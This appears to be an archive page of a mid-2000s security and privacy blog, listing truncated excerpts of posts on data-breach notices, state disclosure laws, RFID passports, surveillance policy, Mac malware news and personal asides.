Nevada is one of a small number of states that actually defines the term ‘encryption’ as used in its breach disclosure law. To wit: NRS 205.4742 “Encryption” defined. “Encryption” means the use of any protective or disruptive measure, including, without limitation, cryptography, enciphering, encoding or a computer contaminant, to: 1. Prevent, impede, delay or disrupt […]

 

State disclosure laws

I’ve written up a comparison of what I believe to be all existing US state disclosure laws with regard to three loopholes that have been discussed by, among others, Rob Lemos and Bruce Schneier recently. I’m experimenting with Blosxom, so I posted this over here. The executive summary is all the state laws could use […]

 

How Low The Bar

The 2nd Circuit Court of Appeals upheld a ruling against a Ms. Cassano, who feared that providing her SSN placed her “in dire jeopardy of having her identity stolen,” refused to provide it, and was terminated. The decision states that “There is no doubt that laws requiring employers to collect SSNs of employees have a […]

 

US Travel ID to have RFID Readable at 25 feet

Declan McCullagh and Anne Broache have the story in “New RFID travel cards could pose privacy threat:” Homeland Security has said, in a government procurement notice posted in September, that “read ranges shall extend to a minimum of 25 feet” in RFID-equipped identification cards used for border crossings. For people crossing on a bus, the […]

 

What Would Jesus Compile?

Generally, when I talk about religion, it’s in the Emacs vs. vi sense. One of my RSS bookmarks contained a somewhat thought-provoking article about the similarities between the philosophy advanced by Free Software Foundation, and certain aspects of Catholic doctrine, and ‘Christian charity’ more broadly. It’s an interesting take on Open Source, and perhaps appropriate […]

 

Internet Explorer Flaw, Transparency, and App Compat

“After IE Attacks, Microsoft Eyes Security Betas” is by Al Sacco at CSOOnline. He has a lot of good orientation and background. Then take a look at Mike Reavy’s “Third party solutions to the Internet Explorer CreateTextRange vulnerability.” Mike runs MSRC, and it’s a pleasant surprise to see him acknowledging customer fears with a post […]

 

Matt Murphy on Microsoft & Transparency

Microsoft needs to be much more transparent about the real nature of the threats customers are facing. Microsoft doesn’t patch phantom vulnerabilities that don’t exist or unrealistic science-fiction attack scenarios. Microsoft’s under-documentation of these vulnerabilities leaves those charged with deploying patches in a tough spot. You simply don’t know what the patches are for. It’s […]

 

Breach Notices Round Up

Because of the volume, I’m going to consolidate these: US Marine Corp/Naval Postgraduate School, 207,750 SSNs, dismal process. From Stars and Stripes, “Thousands of Marines may be at risk for identity theft after loss of portable drive,” via Dataloss list. Marines affected should know there’s an “active duty military” alert you can add to their […]

 

Why trackback spam is bad

% prstat PID USERNAME SIZE RSS STATE PRI NICE TIME CPU PROCESS/NLWP 14135 nobody 16M 12M sleep 60 0 0:00:11 4.2% mt-tb.cgi/1 14207 nobody 14M 11M run 55 0 0:00:08 4.1% mt-tb.cgi/1 14203 nobody 14M 11M run 56 0 0:00:08 4.1% mt-tb.cgi/1 14209 nobody 14M 11M run 54 0 0:00:08 4.1% mt-tb.cgi/1 14215 nobody 14M […]

 

Market Efficiency from an Evolutionary Perspective

I missed this article when it first came out, but Andrew W. Lo’s “Market Efficiency from an Evolutionary Perspective” is fascinating and readable. The abstract: One of the most influential ideas in the past 30 years of the Journal of Portfolio Management is the Efficient Markets Hypothesis, the idea that market prices incorporate all information […]

 

Metasploit blogging

“Official blog of the Metasploit Project.” Either you know who Metasploit is, in which case you’ve already clicked through, or you’re unlikely to understand their subject matter. PS to Vinnie: Where’s the Smallpox-making post?

 

"Security To The Core"

In a post titled “self-evidently wrong post title” “Blog Posts Do Not Include The Words ‘dizzying array of talent,’” Tom Ptacek points out that Arbor Networks has a blog. Jose Nazario’s “The Market-Driven (Vulnerability) Economy” post is pretty good. However, I think we need video of Dug Song reading this text, which in “News Flash: […]

 

Bad neighbor policy?

Many years ago, I needed to deploy a bunch of UNIX machines very quickly. When I created the golden system image, it included an ntp.conf file that pointed to a nearby public stratum 2 server not under my administrative control. This was dumb, because I could (and should) have just had my boxen chime against […]

 

Presidential Power, At Its Lowest Ebb

Attorney General Alberto R. Gonzales left open the possibility yesterday that President Bush could order warrantless wiretaps on telephone calls occurring solely within the United States — a move that would dramatically expand the reach of a controversial National Security Agency surveillance program. From the Washington Post, “Warrantless Wiretaps Possible in U.S..” It used to […]

 

Lab-Grown Bladders

I’m a little behind in posting this, but modern medical science can be so cool: US scientists have successfully implanted bladders grown in the laboratory from patients’ own cells into people with bladder disease. The researchers, from North Carolina’s Wake Forest University, have carried out seven transplants, and in some the organ is working well […]

 

Startup Opportunity: Revive Systems

My friend Robert Stratton has taken the CTO role at Revive Systems. He’s both a serial startup guy (Wheel Group and UUNet) and has been on the investor side In-Q-Tel. We’ve spent some time talking about the technology, too, and it sounds very intriguing. The remainder of this post is his job description for their […]

 

Competition among laws

Declan McCullagh writes cogently on the matter of national security breach legislation. His article makes many important points, and should be read widely. However, his overall thrust — that federal legislation is inferior to state legislation as a means of addressing security breaches — touches too briefly on an important point: we can have both. […]

 
 

Google to Acquire Choicepoint

Mountain View, CA., April 1 /PRNewswire/ — Google today announced plans to acquire Alpharetta, GA based Choicepoint. Choicepoint, 2005 winner of the “Lifetime Acheivement” Big Brother award, is a data warehouser which collects information on everyone it possibly can, and re-sells it widely. “Google’s mission is to “organize the world’s information and make it universally […]

 

National breach list? Pinch me!

H.R. 3997, the Financial Data Protection Act, is one of the many pieces of legislation proposed in the US to deal with identity theft or notification of security breaches. It was approved by the Financial Services Committee of the House of Representatives on 3/16. I haven’t read the full text of the bill (and it […]

 

"Suffering in Silence With Data Breaches"

That’s a huge loophole that could be used in almost every incidence of stolen data, said Dan Clements, CEO of CardCops.com, a company that tracks the sale of stolen credit cards on the Web. Every law enforcement agency that receives a crime report is going to consider the case “under investigation,” he said. “Only about […]

 

Privacy Grants from the Canadian Privacy Commissioner

The Privacy Commissioner of Canada, Jennifer Stoddart, today announced the renewal of funding through her Office’s Contributions Program which, for the last three years, has allowed some of Canada’s brightest privacy experts to develop a wealth of information on various privacy challenges of the 21st century. From “Privacy Commissioner’s Office renews its cutting-edge privacy research […]

 

196,000 HP Employee SSNs, Fidelity Laptop

A laptop lost by Fidelity this month has exposed 196,000 current and former HP employees, staff were told last night. “This is to let you know that Fidelity Investments, record-keeper for the HP retirement plans, recently had a laptop computer stolen that contained personal information about you, including your name, address, social security number and […]

 

Destructive Chaos

Sorry about the unavailability over the last (unknown time period) My DNS registrar, Joker.com was under DDOS attack. If you’re reading this, you either have a cache, or the attack has been mitigated in some way. We now return you to your regularly scheduled list of stolen laptops, lost backup tapes, and who knows, maybe […]

 

You can't buy publicity like this!

UCSB has a project to digitize wax cylinder recordings. They have thousands cataloged, with the majority downloadable as mp3s. It’s awesome. Naturally, I wanted to see what software they used. Being archivists, they of course go into great detail, including this gem: We’d like to use this space as a soapbox to say that Cleaner […]

 

Art Imitating Life?

Many laughs, and perhaps a tear or two, from The Cubes              

 

Breach notification escape mechanisms

In a somewhat incendiary piece published today at Securityfocus.com, Robert Lemos reports on loopholes in notification laws which permit firms to avoid informing people that their personal information has been revealed. According to the article, which along with unnamed “security experts” also cites industry notable Avivah Levitan, “[t]here are three cases in which a company […]

 

I find your faith disturbing

Adam, I learned of the flick via a blog unrelated to either Star Wars or computing, so no need for Google. Not to get all “vi vs. emacs” on you, but I never understood the fascination with Star Wars. :^) Photo cred: kemikore

 

St. Patrick would know what to do

The movie “Jaws” made a lot of money. People like money. Hence, people made derivative movies, “Orca” for example. One copycat, IMO, was so dreadfully bad that it was good. That movie was “Grizzly“, which I saw on its first run. It told the tale of a rogue bear which, you know, basically roamed around […]

 

NJ prosecutor reports debit card ring has been busted

Story at CNET. In related news, OfficeMax says there’s no evidence they were broken into, and back it up with help of outside experts. I’m done being a Kremlinologist on this one, for now. With as little solid info as has made it into the press, it’s just not worth it. Perhaps some facts will […]

 

Identity Theft and Child Pornography

The CBC has a story on how “Global child porn probe led to false accusations:” An international investigation of internet-based child pornography has led to accusations against innocent victims of credit card fraud, a CBC News investigation has found. In other cases, victims of identity theft found themselves fighting to save their reputations, jobs and […]

 

Stolen Ernst and Young laptop had 84,000 SSNs

Information courtesy of the Reporting Form E&Y filed pursuant to New York state law. The consulting firm has been criticized for the delay in reporting this breach, which occurred on January 4.

 

Social Security Administration, 300 Million Americans Not Exposed

I just got my “Your Social Security Statement” in the mail. The very first words on the top of it are “Prevent identity theft—protect your social security number.” Inside, it only prints the password to my cell phone last 4 digits. If your bank, school, or employer does worse, ask them why they’re less enlightened […]

 

New Jersey's breach law

New Jersey’s breach notification law went into effect in mid-December 2005. Like New York’s, it requires that a state entity be notified, in addition to the persons whose info was exposed: c. (1) Any business or public entity required under this section to disclose a breach of security of a customer’s personal information shall, in […]

 

"I've turned into my mother!"

…or, more generally, “I’m now doing that weird thing I saw an influential elder do, but now it seems to make sense”. I have several examples from my own life (generally rather predictable for a balding 40-something suburbanite), but just today I found another one, and I didn’t see it coming.

 

CIBC, One Customer's Wire Transfers, Data They Didn't Use

The federal Privacy Commissioner is looking into a faxing incident involving Canadian Imperial Bank of Commerce and one of its clients. The case began last October when CIBC was told by Christine Soda that she had been receiving faxes at her home in Mississauga that were supposed to be going to Gerry McSorley, who runs […]

 

Ehime Prefectural Police (Japan), Data on unknown # Suspects, Virus

A massive amount of investigation data kept by Ehime Prefectural Police has been leaked onto the Internet, apparently after the computer that kept the data was infected with a virus through the file exchange software Winny, it has been learned. The amount of information leaked from the Ehime police computer is about four times that […]

 

Toyama Japan Hospital, 2,800 patients, file sharing

Information on about 2,800 patients who had surgery at a privately-run hospital in Toyama between 1997 and December 2004 was unintentionally uploaded to the Internet. According to the hospital, the man in charge of data on surgery transferred the information–consisting of patients’ names, sexes, birthdates and information on surgical procedures for which they were hospitalized–to […]

 

SSL Survey over at Matasano

Jeremy Rauch over at Matasano is running a survey on how companies are using HTTPS/SSL. I encourage you to go there resond. My answers are below the cut.

 

North Carolina Transportation Department, 16,000 credit card #s, outside intruder

The Associated Press is reporting that: An Internet server used by the state Transportation Department’s Ferry Division to process credit card payments for ferry fares may have been breached by outsiders, the agency said Friday. The computer database contained 16,000 credit card numbers, the DOT said. The Office of the State Controller has notified its […]

 

"Worth Reading" (Elements of Blogging Style)

The phrase worth reading is a crutch for lazy writers. I use it a lot, and shall use it less. Please call me, and anyone else you read on this bit of spinelessness in our writing. At least, I’ll endeavor to say why I find something worth reading, and try to suggest which readers might […]

 

Direct Marketing Association opposes consumer right to see, correct information

Access and correction rights are something the DMA wants removed from the bill, Cerasale said. For one thing, it would be expensive for list brokers and compilers to set up procedures enabling consumers to access and correct data. For another, the same hackers who caused the breach could also change the data. Multichannelmerchant.com You can’t […]

 

British Columbia, More than 65,000 SINs, Dismal Process

The provincial government has auctioned off computer tapes containing thousands of highly sensitive records, including information about people’s medical conditions, their social insurance numbers and their dates of birth. Sold for $300 along with various other pieces of equipment, the 41 high-capacity data tapes were auctioned in mid-2005 at a site in Surrey that routinely […]

 

Medco (prescription drug service)/ 4600 people, birth dates, SSNs, drug info/lost laptop

Executive summary: Prescription drug benefits provider Medco employee loses laptop with Ohio government employee (and dependents) info. Waits six weeks to let Ohio know. Ohio complains vociferously. Interestingly, the names of the affected individuals were not on the laptop. Money quote from a Medco spokesperson: You’re as efficient as the lessons learned in the last […]

 

John Robb on Big Bangs

In Big Bangs, John Robb uses complex aircraft dynamics as a fascinating metaphor for society: If we look at today’s global environment we see a moderately unstable system. It is a relatively high performance system that is increasingly controlled by global markets. This explains why it is spreading so quickly. However, our drive towards a […]

 

On Computers and Irony

I’ve been saying for a while that destroying information has an ironic tendency: While it’s quite hard to really destroy data on a computer when you want to, (for example, “Hard-Disk Risk“) it’s quite easy to lose the data by accident. Similarly, while it’s quite hard to make code that runs and does what you […]

 

Security Breach Resources

I’ve put together a small set of web pages containing links to current and pending legislation, breach listings, various on-line resources, and so on. There is probably not much there that is new to most readers of these words, but the fact that it is in one place may be helpful. The URL is http://www.cwalsh.org/BreachInfo/ […]

 

Dear Lazyweb

I’m looking for code that will parse the emails sent by online travel agencies and airlines. Ideally, it would be Python code that allows me invoke something like itinerary.get_next_flight(msg) and get a dictionary of (to, from, airline, flight #, date), etc. Does such a library exist?

 

Justice Department Weighs In On Google Subpoena

Surprise surprise, the Department of Justice doesn’t think that the Bush administration’s request for search data violates users’ privacy rights. [Edit: Fixed broken link] [Update: Try this link instead. ]

 

Leverage

Consulting firms are interesting beasts. Often, they are able to make great changes in their clients’ organizations, perhaps not so much because their people are smarter, or even more knowledgable, but because they aren’t subject to the same incentives (pecuniary and otherwise) that client employees face.

 

The future belongs to the quants

The title is of course stolen from Dan Geer. By now, many readers of these words will be familiar with the recent finding in Guin v. Brazos Higher Education Services [pdf] that a financial Institution has no duty to encrypt a customer database. In dismissing the case with prejudice, the court took note of an […]

 

"It fell off the truck. No, really."

Via news.com.au: BANK statements, including customers’ private details, were left on the side of a busy Sydney road after the documents fell off the back of a truck. The confidential account information and credit card statements of thousands of Commonwealth Bank customers were left lying on the Hume Highway at Warwick Farm, in Sydney’s south-west, […]

 

40 Million Pounds Sterling Stolen from British Bank

As reported in The Australian, a group of co-ordinated criminals stole over 40 millions pounds in cash from a processing center. They did so, by the expedient process of dressing up as police officers and kidnapping the wife and child of one of the center’s managers. They then were escorted on site where they subdued […]

 

Ephemeral port security

By now, most have heard about Dubai Ports World, a foreign entity, assuming control of operations at various U.S. ports. The arguments around this transaction are predictable and uninteresting. One thing that is clear is that the Committee on Foreign Investment in the United States (CFIUS) is legally mandated to consider such deals. In fact, […]

 

Updating Windows Mobile Phones

Nothing we ever create, especially software, is ever perfect. One of the banes of professional systems administrators is the software update process, and the risk trade-offs it entails. Patch with a bad patch and you can crash a system; fail to patch soon enough, and you may fall to a known attack vector. The mobile […]

 

Dan Kaminsky on Sony and Anti-Virus

Read “Learning from Sony: An External Perspective” on Dan’s blog: The incident represents much more than a black eye on the AV industry, which not only failed to manage Sony’s rootkit, but failed intentionally. The AV industry is faced with a choice. It has long been accused of being an unproductive use of system resources […]

 

Secretly Admiring

Quick! Name the speaker: In a lot of countries, statements like “this person is over 18”, “this person is a citizen”, the governments will sign those statements. When you go into a chat room, for example, in Belgium, they’ll insist that you present not necessarily the thing that says who you are, but the thing […]

 

Metadata strike again!

Brian Krebs wrote about a botnet and the 733t d00d who ran one, nom de hack 0x80. Well, turns out the doctored on-line photo the Washington Post ran contained metadata identifying the gentleman’s rather small home town. Coupled with information in Krebs’ article concerning businesses near 0x80’s residence, identifying the young criminal would seem a […]

 

Book Review: The Stag Hunt and the Evolution of Social Structure

Brian Skyrms’ The Stag Hunt and the Evolution of Social Structure addresses a subject lying at the intersection of the social sciences, philosophy, and evolutionary biology — how it is possible for social structures to emerge among populations of selfishly-acting individuals. Using Rousseau’s example of a Stag Hunt, in which hunters face a decision between […]

 

Police report on Cheney shooting incident reveals license info

Yet another incident of ineffective redaction? Adam’s del.icio.us bookmarks alerted me to this blog entry, in which commenters describe the ease with which the drivers’ license numbers of witnesses to the VP’s recent hunting accident are revealed. If this stuff is worth blocking, it’s worth blocking properly.

 

True.com Sent 'Race-Customized' Valentines

How are True.com’s Valentine’s Day e-mails targeted? Very simply: one version of their e-mail targets black singles, another targets East Indian lonely hearts, and other versions target the Asian and Hispanic loveless. (Our multi-cultural bots were lucky enough to get one of each). There’s nothing wrong with that on the surface. But we wondered how […]

 

Police Chiefs Gone Wild

Harold Hurtt has suggested that surveillance cameras be placed “in apartment complexes, downtown streets, shopping malls and even private homes”, according to this story in the Seattle Post Intelligencer. In response, I hereby found…. The Hurtt Prize The Hurtt Prize is a $1120 (and growing) reward for the first person who can provide definitive videotaped […]

 

Safari Users: Don't Open "Safe" files after downloading

Go to preferences, general, and un-select that box. From “Apple Safari Browser Automatically Executes Shell Scripts,” via SANS and Eric Rescorla. Don’t miss Peter da Silva’s comment on Eric’s post. Eric, how do you get such good comments?

 

The Leaf of Trust

One of the most interesting and controversial aspects of Phil Zimmerman’s PGP was that it avoided any central repositories of information, relying instead on what Phil labeled the “web of trust.” The idea was that Alice “trusts” Bob, and Bob “trusts” Charlie, there’s some transitive trust that you can establish.[1] (I’m going to stop putting […]

 

Branded Security

For quite some time, Ian Grigg has been calling for security branding for certificate authorities. When making a reservation for a Joie de Vivre hotel, I got the attached Javascript pop-up. (You reach it before the providing a credit card number.) I am FORCED to ask, HOWEVER , what the average consumer is supposed to […]

 

CPNI Public Comment

The FCC has asked for comments on “TELECOMMUNICATIONS CARRIER’S USE OF CUSTOMER PROPRIETARY NETWORK INFORMATION AND OTHER CUSTOMER INFORMATION.” “Customer Proprietary Network Information” is newspeak for “selling your phone records.” Several anonymous readers commented on “Selling Your Phone Records” about their troubles with T-Mobile. Here’s a chance to tell the FCC what you went through. […]

 

The World's Greatest Rock and Roll Band?

Ok, so the Stones are playing, free, in Rio. I figure the crowd will be big. Maybe huge. Apparently not a record-breaker, though: Saturday’s crowd may not be as big as that at Rod Stewart’s 1994 concert, also at Copacabana beach, which drew a crowd of 3.5 million. Rod Stewart?

 

Salesman uses credit application to stalk and rape customer

Police say a convicted murderer used his job as a car salesman in Sandy to track a female customer to her home and rape her. Cleon Jones, 34, was arrested Wednesday on multiple first-degree felonies and remains in the Salt Lake County Jail without bail. Authorities allege Jones tracked down his victim by using her […]

 

University of Northern Iowa, 6000 W-2 forms, virus-infected laptop

An IT person troubleshoots dodgy printing of US earnings documents by loading 6,000 of them onto a laptop. Hilarity ensues when the laptop later turns out to be infected with malware detected during “routine monitoring”. Via wcfCourier.com: The University of Northern Iowa has warned students and faculty to monitor their bank accounts after someone accessed […]

 

Custom Shirts

Get your custom shirts with font size controlled by word frequency. It’s shirts-2.0, now available from Snapshirts. Cool.

 

John Robb on the Next Attack

John Robb has some very interesting thoughts on the next major al Qaeda attack on the United States in “The Next Attacks on America:” The impact of these attacks, particularly if they are numerous (attracting copycats?) and spread out over an extended period of time will be severe. Given their lack of symbolic content (and […]

 

Old Dominion, 601 SSNs, Grad Student's Dismal Process

In 2004, a graduate student apparently posted a class roster of 601 students, complete with names an social security numbers on the web. (“ODU Graduate Student Posts Student Information on Website, School Investigating,” via Netsec.) Update: Lyger of Attrition pointed out that the dates in the WAVY-TV story don’t add up. There’s a story in […]

 

Second OSX Proof of Concept

Today we got a sample of rather interesting case, a Mac OS X Bluetooth worm that spreads over Bluetooth. OSX/Inqtana.A is a proof of concept worm for Mac OS X 10.4 (Tiger). It tries to spread from one infected system to others by using Bluetooth OBEX Push vulnerability CAN-2005-1333. Via F-Secure. I feel weird linking […]

 

Dept of Agriculture, 350,000 Tobacco Farmers, Dismal Process

The Agriculture Department says it accidentally released Social Security numbers and tax IDs for 350,000 tobacco farmers. But the department says those who received the information agreed to destroy copies and return discs to the government. The agency said it inadvertently released the data in response to Freedom of Information Act requests about the tobacco […]

 

Blue Cross of Florida, 27,000 employee SSNs, Contractor

The names and Social Security numbers of about 27,000 Blue Cross and Blue Shield of Florida current and former employees, vendors and contractors were sent by a contractor to his home computer in violation of company policies, the company said Thursday. The contractor had access to a database of identification badge information and transferred it […]

 

LEAP.A Mac Trojan

There seems to be a trojan out for the Mac. See New MacOS X trojan/virus alert, developing…. There’s some interesting tidbits: 6a) If your uid = 0 (you’re root), it creates /Library/InputManagers/ , deletes any existing “apphook” bundle in that folder, and copies “apphook” from /tmp to that folder 6b) If your uid != 0 […]

 

Suffolk County, NY, 7,000+ SSNs, Dismal Process Failures

The Suffolk county [New York] clerk’s office has exposed the Social Security numbers of thousands of homeowners on its Web site, and officials said they don’t have a way to remove them. And soon, a new plan will make it easier to retrieve them. Mortgages and deeds that contain Social Security numbers for an estimated […]

 

Thank You, Choicepoint

It’s been a year since Choicepoint fumbled their disclosure that Nigerian con man Olatunji Oluwatosin had bought personal information about 160,000 Americans. Bob Sullivan broke the story in “Database giant gives access to fake firms,” and managed to presage much of what’s happened in the opening paragraphs of his story: Last week, the company notified […]

 
 

Risk aggregation and the living dead

Light blue touchpaper is a new web log written by researchers in the Security Group at the University of Cambridge Computer Laboratory. You should read it. As for the headline, zombies eat brains. There’s plenty of ’em [edited to add: brains, that is!!] in close proximity in Ross Anderson’s group. ’nuff said.

 

Emergent Intelligence

John Robb has a fascinating post on how networked organizations learn and improve their orientation as they engage with their worlds. In “Emergent Intelligence,” Robb focuses on the Iraqi insurgency, but draws important and general lessons. He says there are five factors needed for emergent intelligence: A critical mass of participation. I’d suggest that a […]

 

The 4th Amendment is Nice to Have

Cities can require stores to send customers’ identification to an electronic database for police to monitor, judges in two [Canadian] provinces have ruled this week. Cash Converters Canada Inc. and British Columbia’s largest pawn shop have each failed to persuade judges that a new generation of city bylaws is trampling customers’ legal rights. From “Courts […]

 
 

Free advice for merchants accepting payment cards

3. Protect Stored Data 3.1 Keep cardholder information storage to a minimum. Develop a data retention and disposal policy. Limit your storage amount and retention time to that which is required for business, legal, and/or regulatory purposes, as documented in the data retention policy. 3.2 Do not store sensitive authentication data subsequent to authorization (not […]

 

Here's a name: Wal-Mart

Via lyger of the Dataloss mailing list, I learned of an article claiming that Wal-Mart may be the big-box retailer involved in several high-profile card reissues stemming from a breach which led to an international series of card frauds. In what appears to be a widening incident, Bank of America, MasterCard and Visa all announced […]

 

The Wallet Game

At lunch after Shmoocon, Nick Mathewson said he’d like to pay something between zero and the amount of money in his wallet. I think this suggests a fascinating game, which is that Alice asks Bob for some amount of money. If Bob has that much money in his wallet, he pays. Otherwise, Alice pays him […]

 

SarBox and Breaches

Earlier today Chris wrote (“Naming names isn’t always bad“): A quick aside to optionsScalper, since you mentioned a firm’s duty to shareholders: when it comes to thinking about breach notices, I think about the efficient markets hypothesis, and whether investors might rationally think that failure to protect data might impact future profitability. Bugger efficient markets! […]

 

Crispier Breach Disclosure (Cooks Illustrated, unknown # CCs)

A good breach disclosure fills you up with what happened, how, and what the company is doing for you. But too often, such notices are soggy and imprecise. Want more precision in the recipe? Beefier response? Cooks Illustrated set out to see what could be done, in “What Happened To Your Website.” Unfortunately, the disclosure […]

 

Naming names isn't always bad

In a comment to an earlier blog entry concerning a ‘he who must not be named’ policy for card processors and others who get breached , optionsScalper asks “given Adam’s recent series on “Disclosure” (at least five posts back to the BofA post on 1/21/2006), how do you (or Adam) assess the disclosure in this […]

 

Hasta La Vista Secure Flight

As mentioned on Freedom To Tinker and by Lauren Gelman, at the Center for Internet and Security, the TSA has mothballed it’s plans to deploy Secure Flight. Though the TSA will surely come up with something else, this is definitely a step in the right direction.

 

On Treatment of Prisoners and the Face of Evil

Establishing villainy is hard work. Too little, and your villains seem pathetic. Too much, and they’re over the top. Even drawing deeply on Joseph Campbell and with the music of John Williams, Lucas still needs actions to show that Darth Vader is the embodiment of evil. What does he choose? The first time we see […]

 

Selling Your Phone Records

Buried in your wireline and wireless telephone subscriber agreement is a notice concerning “customer proprietary network information” (CPNI). CPNI is your calling records. CPNI shows the phone numbers you called and received and for how long you talked. Privacy Rights Clearing House has a guide to “opting out of CPNI sharing.” This is great, because […]

 
 
 

Ka-Ping Yee on Phishing

In “How to Manage Passwords and Prevent Phishing,” Ping writes: So, right up front, here is the key property of this proposal: using it is more convenient than not using it. This property makes this proposal unique (as far as I am aware). All the other proposals I have seen require the user, on each […]

 

Brigham and Women's Hospital, 60 Medical Records, Fax Errors

For the past six months, Brigham and Women’s Hospital in Boston has been accidentally faxing the confidential medical records of women who’d recently given birth to a Boston investment bank, regardless of the bank’s repeated attempts to stop them, the Boston Herald reports. (via CSO Online.) (and) The records, called inpatient admission sheets, contain a […]

 

City of Washington DC, 190,000 SSNs, Willful Ignorance of Federal Law

Although Washington, DC routinely capitalizes on the strictest interpretation of its own traffic laws, the federal city has found itself in violation of a federal law intended to protect drivers from identity theft. Since December it has been illegal to display Social Security numbers on driver’s licenses, yet the District Department of Motor Vehicles continues […]

 

Blue Cross of North Carolina, 629 SSNs, "Human Error"

A “human error” at Blue Cross and Blue Shield of North Carolina allowed the Social Security numbers of more than 600 members to be printed on the mailing labels of envelopes sent to them with information about a new insurance plan. (“Computerworld“)

 

That's gotta sting

This administration reacts to anyone who questions this illegal program by saying that those of us who demand the truth and stand up for our rights and freedoms somehow has a pre-9/11 world view. In fact, the President has a pre-1776 world view. Our government has three branches, not one. And no one, not even […]

 

Is That Legal?

In comments on Chris’s post “Nations Bank, 100,000 credit cards, breach at unnamed(!) processor,” OptionsScalper asks: It is amazing that the unnamed processor remains unnamed (or do I misunderstand?). I think the risk to customers at this bank has not been reduced, i.e. card replacement is ineffective. How does one even go about measuring whether […]

 

Nations Regions Bank, 100,000 credit cards, breach at unnamed(!) processor

From Indychannel.com: Regions Bank is canceling the credit cards of 100,000 of its customers in 15 states — including Indiana — saying a separate company put their credit information at risk. Regions said the security breach involves a company that processes credit and debit cards nationwide. The bank, which says it was not responsible for […]

 

It Depends What The Meaning of "Credit Report" Is

Bob Sullivan has a must-read article “Her ATM card, but her impostor’s picture” about a woman whose SSN is being used by someone else: For years, Margaret Harrison believed she had an impostor. There were signs her Social Security number was living a double life. Four years ago, an unemployment office in West Virginia almost […]

 

Tools and Secure Code

Mike Howard (and company) have a great post about why “Code Scanning Tools Do Not Make Software Secure:” Such tools, often called static analysis tools, such as the tools we have included in Visual Studio 2005, are very useful, but they are no replacement for human intellect. If a developer does not know how to […]

 

New OpenSSH, with nifty feature

OpenSSH 4.3 is out. It has one new feature: Add support for tunneling arbitrary network packets over a connection between an OpenSSH client and server via tun(4) virtual network interfaces. This allows the use of OpenSSH (4.3+) to create a true VPN between the client and server providing real network connectivity at layer 2 or […]

 

Disclosure Laws, Redux

In responding to Lyal Collins’ comment on my “Disclosure Laws” post, I went and read the Rhode Island Identity Theft Protection act of 2005 (H6191). A couple of things occured to me. First, the National Conference of State Legislatures has a great list of Security Breach Legislation. Second, and perhaps more important, I don’t see […]

 

Disclosure Laws

In an article (“Credit card numbers reported stolen from R.I. state Web site“) about the Rhode Island breach, I found the following quotes: The breach on Dec. 28 was detected during a routine security audit and reported to the state government the following day, Loring said. At the time, the company believed only eight credit […]

 

Responding to Terror

Once I was loose on the streets of the city, I continued to be impressed with what I saw. Spain is definitely no stranger to terrorism. They suffered the Madrid bombings just over 18 months ago and have been living with the current form of the ongoing sometimes-violent Basque Separatist movement since 1968. Somehow, though, […]

 

An unethical strategy?

Voting is a means of aggregating individual preferences in order to obtain a collective choice from a set of potential outcomes. Arrow notwithstanding, various voting schemes are often used for very important decisions. Voting is also used to select the winner of the Guy Toph Award, in Hillsborough County, Florida. In this case, the voters […]

 

Sports Authority in another Point-of-Sale data retention SNAFU?

I posted this to the Dataloss list earlier today. Sports Authority Inc. confirmed this week that it recently launched an investigation into its information system after four international banks alerted it to a potential intrusion into its network in December. With help from the Secret Service and Cybertrust Inc., the sporting goods company determined that […]

 

The Art of Shmoozing

Guy Kawasaki has a great post up on “The Art of Schmoozing.” It’s full of great advice. So read it, and let me know, what can we do to make this blog more useful to you?

 

Swire on Disclosure, Redux

Following on Chris’s post on disclosure, I’ve been meaning to mention Peter Swire’s “A Theory of Disclosure for Security and Competitive Reasons: Open Source, Proprietary Software, and Government Agencies:” A previous article proposed a model for when disclosure helps or hurts security, and provided reasons why computer security is often different in this respect than […]

 

The following is not to be construed as legal advice. Or anything else.

The acronym “IANAL” is no doubt familiar to anyone reading these words. Well, I Am Not A Lawyer, but Paul Rianda is, and he wrote an interesting article for Transaction World’s September 2005 issue, that I happened to run across. In it, Mr. Rianda, esq., discusses his view of why the breaches we are all […]

 

Without Surveillance, We'd Have Anarchy In The Streets

The New York Times reports that “Police Officers Sue Over Police Surveillance of Their Protests.” Previously in the New York Police Department department, we offered a look back at the “The New York City Police Riots,” which, if you think about it, indicates that New York City Police, unlike most of the unarmed demonstrators in […]

 

Redaction Is Harder Than Public Speaking

Did you ever have one of those days where you had a great, totally unfair pot shot to sling at Microsoft, and events just overtake your plans? It started out when I watched the videos of “Blue Hat 2005 – Security Researchers come to MS, Part I.” Now, I have some insight into the training […]

 

Dataloss Mail List

In what has become a near weekly occurance, large companies are collecting your personal information (sometimes without your knowledge or consent), and subsequently letting it fall into the hands of the bad guys. This is your personal information; name, address, social security number, credit card number, bank account numbers, and more. Data Loss is a […]

 

University of Colorado at Colorado Springs, 2500 employees, SSNs, "virus"

Looks like a worm hit a personnel department PC. From the Colorado Springs Gazette: Personal information on about 2,500 current and former employees at the University of Colorado at Colorado Springs has been compromised by someone who hacked into a computer and infected it with a virus. Names, Social Security numbers, birth dates and addresses […]

 

Breach disclosure insurance

A common argument used against state-level breach notification laws, and in favor of federal legislation overriding state laws, is that existence of these numerous state laws with their differing requirements and conditions raises the cost of compliance unacceptably. Just to be prepared to comply with potentially fifty distinct notification regimes, a firm would need to […]

 

Somebody's Watching Me

Don’t miss the awesome video of Somebody’s Watching Me from Progress Now Action. (Dear Sama: Thanks!)

 
 
 

"Contrasts in presentation style"

“Contrasts in presentation style: Yoda vs. Darth Vader” is brilliant! How can I not love a mash-up of what you do and Star Wars?

 

TSA Records

Back in August, (“Demand Your records“) I mentioned the effort to request, under the Freedom of Information Act, records relating to the TSA’s illegal data grab on Americans. In December, I got a response, and share a redacted copy here. All redactions are mine. (The whole process of redaction is remarkably difficult, but that’s a […]

 

Workshop on the Economics of Securing the Information Infrastructure

Workshop on the Economics of Securing the Information Infrastructure October 23-24, 2006 Arlington, VA Submissions Due: August 6, 2006 (11:59PM PST) Has just been announced. There’s a great topics list, and a great list for the program committee. It should be quite the workshop.

 

New Passports More Secure than Wet Paper Bags (Barely)

Remember the US Government plan to put a radio chip in your passport? The one whose security has never been seriously studied, whose justification seemed to boil down to a hope that it would speed processing, but even that was wrong? The one whose security gets worse every time anyone competent looks at it? Well, […]

 

On Disclosure

In comments on “Bank of America Customers Under Attack,” Options Scalper writes: I’m uncertain of the “mandatory disclosure” that you discuss here. If by this you mean of data lost in transactions similar to what you mention above, I agree. But if you mean data from the call center to determine the level of theft/fraud […]

 

Musings on The Future of the State

